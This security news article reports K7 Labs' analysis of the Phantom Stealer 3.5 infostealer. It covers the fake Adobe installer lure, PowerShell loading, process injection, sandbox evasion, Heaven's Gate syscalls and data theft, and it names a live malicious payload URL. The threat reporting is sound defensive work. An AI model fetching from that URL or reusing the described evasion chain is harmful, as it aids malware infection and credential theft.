Phantom Stealer version 3.5 has emerged as a serious threat to users worldwide, capable of extracting sensitive information including passwords, browser cookies, credit card details, and cryptocurrency wallet data.
This sophisticated malware operates through deceptive packaging, often disguised as legitimate Adobe software installers, making it difficult for unaware users to identify the danger before infection occurs.
The attack begins with a fake Adobe 11.7.7 installer file, first identified on October 29, 2025. The file is actually an obfuscated XML document containing embedded JavaScript code designed to trigger a chain of malicious activities.
When executed, the file downloads a PowerShell script from a remote server, setting the stage for deeper system compromise and data collection.
K7 Security Labs researchers identified that Phantom Stealer employs a multi-stage infection mechanism that demonstrates significant technical sophistication.
.webp "Phantom Stealer Attacking Users to Steal Sensitive Data like Passwords, Browser Cookies, Credit Card Data 2")
The malware downloads an obfuscated PowerShell script from the URL positivepay-messages.com/file/floor.ps1, which executes with hidden attributes and bypassing security policies.
This script contains RC4-encrypted data that, once decrypted, reveals instructions for loading a .NET assembly directly into memory.
.webp "Phantom Stealer Attacking Users to Steal Sensitive Data like Passwords, Browser Cookies, Credit Card Data 4")
The second phase involves the BLACKHAWK.dll injector, a critical component that performs process injection into the legitimate Windows utility Aspnetcompiler.exe.
This injection technique loads malicious code into a trusted system process, allowing the stealer to operate under the radar of security software.
The malware continuously monitors whether Aspnetcompiler.exe is running at five-second intervals, ensuring persistent operation.
Process Injection and Evasion Techniques
Phantom Stealer leverages advanced evasion methods to avoid detection and analysis. The malware implements numerous anti-analysis checks, including detection of virtual machines, sandboxes, and monitoring tools through suspicious username matching against a hardcoded list of 112 sandbox usernames.
.webp "Phantom Stealer Attacking Users to Steal Sensitive Data like Passwords, Browser Cookies, Credit Card Data 5")
If such environments are detected, the malware self-destructs by creating a batch file that forcefully terminates its process.
Most notably, the stealer uses Heavens Gate, a sophisticated usermode-hook evasion technique where 32-bit processes transition to 64-bit execution mode.
This allows the malware to bypass 32-bit user-mode hooks and perform native x64 syscalls directly, accessing sensitive data without triggering security mechanisms designed to monitor process behavior.
Once installed, Phantom Stealer extracts browser credentials, including Chrome and Edge data, by accessing encrypted databases and decrypting them using extracted encryption keys.
The malware harvests cryptocurrency wallet credentials, Outlook email configurations, keylogged data, and system information including screenshots captured every 1000 milliseconds.
For data exfiltration, the stealer employs multiple channels, including SMTP, FTP protocols, and communication platforms like Telegram and Discord.
Stolen data is organized with computer names and timestamps, creating an organized repository of victim information ready for malicious use.
Organizations should implement robust email filtering, regular software updates, and advanced endpoint protection to defend against this evolving threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
